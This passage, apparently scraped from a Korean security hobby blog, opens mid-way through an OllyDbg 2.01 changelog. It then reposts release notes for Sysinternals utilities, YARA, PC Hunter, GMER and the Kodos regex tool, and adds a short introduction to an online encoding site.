■ SEH and VEH chains. To decode addresses of VEH handlers, OllyDbg hacks NTDLL.RtlAddVectoredExceptionHandler(), therefore process must be started from the OllyDbg

■ Multibyte character dumps

■ .udl image libraries, replace scan of object files from v1.10

■ Search for integers and floats in dump

■ Search for procedures (entry points)

■ Limited support for NTFS streams

■ Drive dump

■ Software breakpoints that use INT1, HLT, CLI, STI or INSB instead of INT3

■ Multiple watches in one line, support for repeat count

■ Dump of arrays of structures

■ Micro-analysers

■ Accelerated search

■ Assembling of immediate data statements (DB xx etc.)

■ Highlighting in run trace

■ Up to 2 ordinals per address

■ Limited support for Win95 via Microsoft Layer for UNICODE

■ More tricky code sequences

■ Show free memory, or was it the previous version?

■ Multiple bugfixes


Yes, you understand it correctly. OllyDbg graphic interface supports multiple languages. All you need is the corresponding language file. Currently there are none, but I expect that the volunteers will be able to make more or less complete translations.


Plugins compiled for OllyDbg 2.01 beta are 100% compatible with v2.01. PDK will be updated... soon...


Preliminary version of Disassembler 2.01 is almost ready. That is, the sources are more or less final but documentation and ready-to-use DLLs are still missing. I release Disasm 2.01 under GPL v3. Commercial licenses are also possible.



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


Sysinternals Tool 중 몇가지가 업데이트 되었네요! 
링크 연결 하오니~ 필요하신 분들은 다운로드 받으세요!!

이번 업데이트에서는 제가 주로 사용하는 Autoruns, Process Explorer 프로그램이 업데이트 되었네요.

- 업데이트 목록(클릭하시면 새창으로 이동합니다)

Autoruns v11.70 : This release of Autoruns, a powerful utility for scanning and disabling autostart code, adds a new option to have it show only per-user locations, something that is useful when analyzing the autostarts of different accounts than the one that
Autoruns is running under.

Bginfo v4.20 : BgInfo, a utility that creates custom desktop backgrounds that display system information, now correctly reports version information for Windows 8.1 and Windows Server 2012 R2.

Disk2vhd v1.64 : This update to Disk2Vhd, a tool for converting physical system disks to VHDs for use by virtual machines, now supports disk sizes of up to 2 TB.

Process Explorer v15.40 : Process Explorer, a Task Manager replacement, now shows WMI providers hosted in Wmiprvse processes (thanks to Mohamed Elghetany for contributions); includes an option that configures it to automatically run when you logon; and introduces a
process view column that shows process DPI awareness support on Windows 8.1 systems.



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


Sysinternals Tool 중 몇가지가 업데이트 되었네요! 

링크 연결 하오니~ 필요하신 분들은 다운로드 받으세요!!

Autoruns v11.62는 저번에 v11.61로 올라왔었지만, 문제가 이미지로 이동하는 부분에 버그가 발생되어 이번에 업뎃이 새롭게
되었습니다.
 

- 업데이트 목록(클릭하시면 새창으로 이동합니다)

Autoruns v11.62 :  Autoruns is a utility for managing autostarting applications, DLLs and services.  This update adds more autostart locations, fixes a bug that could cause a crash when Autorunsc is directed to calculate file hashes, and fixes a bug in Autoruns' jump-to-image functionality on 64-bit Windows. (add) This release fixes a bug in version 11.61's jump-to-image functionality.


Strings v2.52 :  This release fixes a bug that prevented the previous one from running on Windows XP.


Zoomit v4.5 :  Zoomit is a screen zooming and annotation tool for technical presentations. This release introduces better support for zooming in on Windows 8 Windows Store applications. 



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.



분석을 하다보면 URL Encode / Decode 가 불가피하게 필요할 때가 존재한다.


Encode/Decode도 종류가 여러가지가 존재하여, 각각 맞는 툴을 찾아 쓰는것도 귀찮을 때가 있다.

이럴때 사용하면 좋은 사이트가 있어서 소개한다.



- 스트링펑션 사이트 바로가기 : http://www.stringfunction.com

Encode 및 Decode 할 수 있는 종류는 아래와 같다.

 

- Convert

Ascii to Binary

Ascii to Decimal

Ascii String to Hex

Binary to Decimal

Binary to Hex

Decimal to Binary

Decimal to Hex

Hex to Binary

Hex to Decimal

Hex to String

Reverse String

String to Lowercase

String to Uppercase

Hex to Rgb

Rgb to Hex


- Count

String Length


- Decode

Html Decode

Url Decode


- Decrypt

Md5 Decrypter

Sha1 Decrypter


- Encode

Html Encode


- Url Encode


- Encrypt

Md5 Hash

Sha1 Hash




블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




Sysinternals Tool 중 몇가지가 업데이트 되었네요! 

링크 연결 하오니~ 필요하신 분들은 다운로드 받으세요!!

오랫만의 Process Explorer가 업데이트 되었네요.

- 업데이트 목록(클릭하시면 새창으로 이동합니다)

Autoruns v11.6 : Autoruns is a utility for enumerating and disabling executables and DLLs configured to activate in dozens of autostart registration points.  This update fixes some minor bugs and adds Authenticode SHA1 and SHA256 hash reporting to Autorunsc output.


Sigcheck v1.92 : Sigcheck is a command-line utility for reporting image version and signature information.  With this update, it now includes support for Authenticode SHA256 hashes, which is the same hash type used to identify images by AppLocker.


Process Explorer v15.31 : Process Explorer is a powerful process management utility. This update fixes a bug with copying text from the process properties dialog and adds an option to disable the heatmap display in the process view.


Process Monitor v3.05 : Process Monitor is a powerful file, registry, process, thread and network monitoring tool.  This update adds a context-menu entry that opens the filter edit dialog with contents prepopulated with the specified row and column value.



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.



Sysinternals Tool 중 몇가지가 업데이트 되었네요! 

링크 연결 하오니~ 필요하신 분들은 다운로드 받으세요!!

오랫만의 업데이트라 방갑네요;;

- 업데이트 목록(클릭하시면 새창으로 이동합니다)

AccessChk v5.11 : AccessChk, a command line utility for dumping the effective permissions and security descriptors for files, registry keys, processes, tokens, object manager objects, now prefixes Windows 8 application container SIDs with the word "Package", and includes several minor bug fixes.


Procdump v6.0 : Procdump is an advanced utility for capturing process memory dumps based on a variety of triggers including CPU usage, memory usage, performance counter values, and exceptions. Version 6.0 is a major upgrade that adds the ability to specify multiple filters, attach to a process by service name, and display/filter on the message text of a CLR or JScript exception.


RAMMap v1.22 : RAMMap is a graphic utility that shows the breakdown of physical memory usage across different dimensions. This release fixes a bug that could cause a crash when accessing the cached files page when a cached file's name exceeded a certain length.


Strings v2.51 : This update to Strings, a command-line utility that prints a file's embedded Unicode and ASCII strings, fixes a signed file offset printing bug.




블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.



디텍트툴로 많이 알려진 야라(YARA)가 1.7버전으로 업데이트 되었네요.
특히 이번 업데이트에서는 32Bit 뿐만 아니라, 64Bit 도 지원을 하기 때문에 사용범위가 더 넓어졌다고 볼 수 있다.

야라는 현재 많은 곳에서 사용하고 있으나, 가장 유명한 곳은 아래와 같은 곳입니다.
- VirusTotal Intelligence (https://www.virustotal.com/intelligence)
- We Watch Your Website (http://www.wewatchyourwebsite.com)
- FireEye, Inc. (http://www.fireeye.com)
 
개인적으로도 야라는 정규식을 지원하기 때문에 더 유명해졌다고 생각합니다.
※ 참고로 이번 업데이트를 통해 정규식 중 "#"을 이용한 개수를 세는 식이 동작하지 않습니다.


- YARA 프로젝트 : https://code.google.com/p/yara-project

이번 1.7 업데이트에서는 다음과 같이 수정되었습니다.

version 1.7 (29/03/2013)


faster compilation

added suport for modulus (%) and bitwise xor (|) operators

better hashing of regular expressions

BUGFIX: yara-python segfault when using dir() on Rules and Match classes

BUGFIX: Integer overflow causing infinite loop

BUGFIX: Handling strings containing \x00 characters correctly

BUGFIX: Regular expressions not matching at the end of the file when compiled with RE2

BUGFIX: Memory leaks

BUGFIX: File handle leaks



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


Sysinternals Tool 중 몇가지가 업데이트 되었네요! 
링크 연결 하오니~ 필요하신 분들은 다운로드 받으세요!!

- 업데이트 목록(클릭하시면 새창으로 이동합니다)

Autoruns v11.5 : This update to Autoruns, a utility for managing autostarting applications and components, now reports the image timestamp of executables and the last-modified timestamp of other file types and autostart locations to help with forensic analysis. The jump-to-entry feature is also improved to navigate directly to files rather than their parent directory.


Disk Usage (Du) v1.5 : Du, a command-line utility for reporting the disk space consumed by directories and their files, has expanded CSV output that includes file and directory counts, as well as an option for tab-delimiting, which is a format more convenient for import into Excel than comma-delimited.


ProcDump v5.14 : This release of Procdump, a command-line utility that enables the capture of process dumps based on numerous trigger types including on-demand, doesn’t report process exceptions unless the exception trigger is specified.


Process Monitor v3.04 : Procmon, a power system activity monitor, now includes support for new Windows 8 file information query types and fixes a bug in the tooltip handling.


Registry Usage (RU) v1.0 : Ru (Registry Usage) is a new command-line utility that reports the size, value and subkey counts of registry keys. Like its Sysinternals Du (Disk Usage) counterpart, Ru can help you find the keys that contribute to registry bloat.


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


정규식을 사용하시는 분들에게 아주 유용한 툴이다.
(물론 정규식을 잘 짜는 분들은 별로 그닥 필요없다 ㅎㅎㅎㅎ)

정규식이 무엇인지 잘 모르신다면 아래의 링크에서 확인!!

이번에 소개 한 Kodos 2.4.9 버전의 툴은 사용자가 지정한 정규표현식과 특정 대상을 비교하여 오류 발견 및 수정하는데
아주 유용 한 툴이다.

다운로드는 아래의 페이지에서 받을 수 있다.

- Kodos 홈페이지http://kodos.sourceforge.net
- Kodos 다운로드 페이지http://sourceforge.net/projects/kodos/files





Kodos 사용방법은 아래 그림에 표기를 해두었다.
제일 먼저 사용자가 작성한 정규표현식을 최상단에 적고,
비교 할 문구를 두번째 박스에 넣는다.
그러면 자동으로 정규표현식에 의해 동일한 부분을 체크해 준다.(파란색 부분)




블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.



안티 루트킷 탐지 툴로 유명한 XueTr 프로그램이 이름이 바뀌어서 새롭게 나왓네요.

새롭게 변경 된 이름은 PC Hunter 입니다.

기존의 
XueTr 프로그램은 64Bit가 지원되지 않아서 좀 기다리고 있었는데, 이미 새로운 이름으로 바뀌어서 출시를 했군요.

- PC Hunter 다운로드 : http://down.epoolsoft.com/pchunter/PCHunter_free.zip

이번 1.1 업데이트에서는 다음과 같이 수정되었습니다.

지원가능 한  OS :

Windows 2000 SP4 (32-bit only)

Windows XP (32-bit only)

Windows Server 2003 (32-bit only)

Windows Vista (32-bit only)

Windows Server 2008 (32-bit only)

Windows 7 (32/64)

Windows 8 (32/64)

기능 개선 : 
1. Process, thread, process modules, process window, process memory View, kill process, kill the thread, uninstall module functions

2. kernel driver module view, to support the memory copy of the kernel driver module 
View 


3. SSDT, Shadow SSDT, FSD, KBD, TCPIP, Classpnp, Atapi, Acpi, SCSI, IDT, GDT, and can detect and
restore ssdt hook and inline hook


4. CreateProcess, CreateThread, LoadImage, CmpCallback, BugCheckCallback, Shutdown,
Lego Notify Routine View, and support the deletion of these Notify Routine


5. Port View 2000 system does not currently support 

6.
View the message hook


7. kernel module iat, eat, inline hook, patches detection and recovery 

8. 
Disk, volume, keyboard, network layer filter driver detection, and support for the deletion


9. Registry Editor


10. Process iat, eat, inline hook, patches detection and recovery


11. file system view, to support basic file operations


12. view (edit) IE plug-in, SPI, startup items, services, Host file, image hijacking file associations,
system firewall rules, IME


13. ObjectType Hook detection and recovery 
Detect and remove

14. DPC timer


15. MBR Rootkit detection and repair


16. kernel objects hijacking detection


17. WorkerThread enumeration


18. Ndis some callback information enumeration


19. Hardware debug registers, commissioning API detection


20. Enumeration the SFilter / Flgmgr callback


21. Detection system user name



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


루트킷 탐지 툴로 유명한 지머(Gmer)가 2.1로 업데이트를 했네요.


이번 2.1 업데이트에서는 다음과 같이 수정되었습니다.

The latest version of  GMER 2.1.18952 released 2013.02.13
GMER runs only on Windows NT/W2K/XP/VISTA/7/8
 
- Added third-party software component scan (타사 소프트웨어 구성요소 검사 추가)
- Improved services scanning (서비스 스캐닝 향상)
- Improved registry scanning (레지스트리 스캐닝 향상)
- Fixed Windows 8 x86 lock issue (Windows 8 잠금 이슈 수정)

다운로드 링크 : http://www2.gmer.net/gmer.zip


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


Sysinternals Tool 중 몇가지가 업데이트 되었네요! 
링크 연결 하오니~ 필요하신 분들은 다운로드 받으세요!!

오랫만에 Process Explorer 가 업데이트 되었네요.
이번 업데이트에서는 프로세스CPU, Private bytes, GPU, 프로세스 내 보안그룹 등, Windows8 에 대한 버그도 해결되었네요.

- 업데이트 목록(클릭하시면 새창으로 이동합니다)

Pendmoves v1.2 : This update to Pendmoves adds support for 64-bit directories.

Process Explorer v15.3 : This major Process Explorer release includes heat-map display for process CPU, private bytes, working set and GPU columns, sortable security groups in the process properties security page, and tooltip reporting of tasks executing in Windows 8 Taskhostex processes. It also creates dump files that match the bitness of the target process and works around a bug introduced in Windows 8 disk counter reporting.

Sigcheck v1.91 : This update to Sigcheck prints the link time for executable files instead of the file last-modified time, and fixes a bug introduced in 1.9 where the –q switch didn’t suppress the print out of the banner.

Zoomit v4.42 : Zoomit now includes an option to suppress zoom-in and zoom-out animation to better support remote RDP sessions and fixes a bug that caused static zoom to snap to the top and left side of the screen in some cases. 



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


Sysinternals Tool 중 몇가지가 업데이트 되었네요! 
링크 연결 하오니~ 필요하신 분들은 다운로드 받으세요!!

- 업데이트 목록(클릭하시면 새창으로 이동합니다)

DebugView v4.81 : Version 4.81 of DebugView, a utility that logs user and kernel-modedebug output messages,  fixes a bug that could cause it on some executionsto fail to capture debug output and enter a CPU-bound loop.


ProcDump v5.11 : This release of ProcDump fixes a bug introduced in version 5.1 that 
prevented it from working on 32-bit Windows XP.

ZoomIt v4.41 : This update to ZoomIt, a screen magnification and annotation utility, includessmoother zooming behavior, adds the ability to specify the initial zoom level, and maintains the window focus when initiating live zooming. 


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


Sysinternals Tool 중 몇가지가 업데이트 되었네요! 
링크 연결 하오니~ 필요하신 분들은 다운로드 받으세요!!

- 업데이트 목록(클릭하시면 새창으로 이동합니다)

AdExplorer v1.44 : This release fixes a bug that caused AdExplorer to crash when it encountered corrupted extended rights schemas.

Contig v1.7 : Contig is a command-line file defragmentation and fragmentation analysis utility. v1.7 has more detailed fragmentation analysis reporting, fixes a bug that enables creation of contiguous files larger than 8GB, and adds support for setting the valid data length on files to avoid zero-fill overhead.

Coreinfo v3.2 : Coreinfo, a command-line utility that dumps processor topology and feature support, now reports the presence of many additional features, including SMAP, RDSEED, BMI1, ADX, HLE, RTM, and INVPCID.

Procdump v5.1 : This major update to Procdump, a command-line utility for creating process crash dump files based on triggers or on-demand, adds support for Silverlight applications and the ability to register Procdump as the just-in-time (JIT) debugger for more advanced scenarios.




블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


Sysinternals Tool 중 몇가지가 업데이트 되었네요! 
링크 연결 하오니~ 필요하신 분들은 다운로드 받으세요!!

이중에서 개인적으로 Desktops v2.0 프로그램을 간단하게 소개하면, 
가상의 데스크탑 바탕화면을 4개를 생성하여, Hot키를 이용하여 관리할 수 있는 툴입니다.

아이콘이 많은 사용자나 프로그램을 여러개 사용하는 사용자들이 사용하면 유용할 듯^^

- 업데이트 목록(클릭하시면 새창으로 이동합니다)

Coreinfo v3.1 : This update to Coreinfo, a command line utility that reports detailed information about a system’s processor topology, CPU features, and cache topology, fixes a bug affecting the calculation of NUMA node costs and adds support for several more processor features, including RDRAND, LAHF/SAHF, Prefetchw and Intel Speedstep.


Desktops v2.0 : Desktops, a virtual desktop utility for Windows that lets you create up to three additional workspaces, is now compatible with Windows 8, properly supporting Winkey hotkey sequences (like Winkey+R to bring up the Run dialog) on alternate desktops and switching back to the primary desktop’s start screen when you hit Winkey.


Livekd v5.3 : LiveKd, a command-line utility that enables you to use the Windows kernel debuggers to examine live systems as well as virtual machines, now support Windows 8.


PsPasswd v1.23 : PsPasswd, a Pstools utility for remoting changing local machine passwords, now includes support for changing domain account passwords.


Testlimit v5.22 : This release of TestLimit, an educational tool for testing the way Windows handles exhaustion of various resource types such as system commit, fixes an output formatting bug that could have it report KB instead of MB.


Whois v1.11 : Whois v1.11, a tool for looking up domain name registration information, includes bug fixes that could cause it to crash if provided with malformed domain name input strings.


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


Sysinternals Tool 중 몇가지가 업데이트 되었네요! 
링크 연결 하오니~ 필요하신 분들은 다운로드 받으세요!!

간만에 Process Explorer가 업데이트가 되었네요.
토큰 뷰 기능과 스레드 스택 확인 시 충돌나는 버그등을 수정했다고 합니다.
다른건 많이 안쓰지만 Process Explorer는 많이 사용하기 떄문에 ㅎㅎㅎㅎ 업데이트 고고싱!! 

- 업데이트 목록(클릭하시면 새창으로 이동합니다)

PsPing v1.0 : PsPing is a new Sysinternals PsTools command-line utility for measuring network performance. In addition to standard ICMP ping functionality, it can report the latency of connecting to TCP ports, the latency of TCP round-trip communication between systems, and the TCP bandwidth available to a connection between systems. Besides obtaining min, max, and average values in 0.01ms resolution, you can also use PsPing to generate histograms of the results that are easy to import into spreadsheets.
 

DebugView v4.8 : This release of DebugView, a debug output monitoring utility, addresses a bug that could cause DebugView to blue screen on “checked build” (debug) versions of Windows.
 

Process Explorer v15.23 : This update to Process Explorer adds the ability to view the process token of protected processes, fixes a bug that causes a crash when viewing thread stacks on Windows XP, and fixes a bug that causes a crash when running on Windows PE.


Sigcheck v1.81 : This update to Sigcheck, a command-line utility for analyzing the digital signatures of executable images, fixes a bug that could cause it to crash when reporting the signing status of images that have invalid signatures. 


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


Sysinternals Tool 중 몇가지가 업데이트 되었네요! 
링크 연결 하오니~ 필요하신 분들은 다운로드 받으세요!!

- 업데이트 목록(클릭하시면 새창으로 이동합니다)

Autoruns v11.34 : This release of Autoruns fixes a bug that caused it to not show some Internet Explorer extensions.
 

ProcDump v5.0 : Procdump is an advanced utility for capturing process memory dumps based on a variety of triggers including CPU usage, memory usage, performance counter values, and exceptions. Version 5.0 is a major upgrade that adds the ability to configure exception filters based on managed and native exception types, extends support to Windows 8 modern applications, and integrates with Process Monitor’s debug output logging.
 

Sigcheck v1.8 : This update to Sigcheck, a command-line file version and digital signature verification utility, shows detailed certificate information such as certificate usage, validity dates, and thumbprints, and also shows a file’s counter-signing chain if it has one.
 

VMMap v3.11 : VMMap, a utility that shows detailed information about a process’ virtual and physical memory usage, now reports commit usage instead of working set in its timeline view and fixes a bug that enables export of captures of 32-bit processes. 


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


Sysinternals Tool 중 몇가지가 업데이트 되었네요! 
링크 연결 하오니~ 필요하신 분들은 다운로드 받으세요!!

- 업데이트 목록(클릭하시면 새창으로 이동합니다)

AccessChk v5.1 : This update to AccessChk, a command-line utility that shows the security settings and effective access on many object types, including registry keys and files, now reports Windows 8 claims and capabilities, shows the token of processes running as local system, lists security descriptor flags, and checks for remote interactive logon rights.

Autoruns v11.33 : This fixes a bug that caused the run as administrator elevation to fail if Autoruns was started from a path with spaces.

Coreinfo v3.05 : Coreinfo, a tool that shows CPU features, cache sizes, and topology, now correctly shows hyperthreading support on AMD multicore systems and lists processor features on Windows XP.

Whois v1.1 : Whois is a command-line utility that looks up domain name registration information. This release fixes a bug that could cause an infinite loop and a command-line option, -v, that prints verbose information about domain registration referrals. 



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


Sysinternals Tool 중 몇가지가 업데이트 되었네요! 
링크 연결 하오니~ 필요하신 분들은 다운로드 받으세요!!

요즘 Process Explorer 의 마이너 업데이트가 계속 나오네요, 많이 사용하는 만큼 버그들도 속속 나오나 보군요!! 

- 업데이트 목록(클릭하시면 새창으로 이동합니다) 
Handle v3.5 : This update to Handle, a command-line utility that lists open handles, uses the most recent Process Explorer driver so that it now resolves system process handles and types.

Process Explorer v15.22 : This release addresses a bug that caused Process Explorer to crash when viewing .NET thread stacks of 64-bit Windows XP and 64-bit Windows Server 2003.

Process Monitor v3.03 : A bug that caused some symbols to not resolve in stack traces is fixed in this release.

RAMMap v1.21 : This fixes a bug that causes RAMMap to sometimes report an error on 32-bit versions of Windows.

ZoomIt v4.3 : This update to ZoomIt, a screen magnification and annotation utility, adds an option that enables you to configure it to automatically start when you login.



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.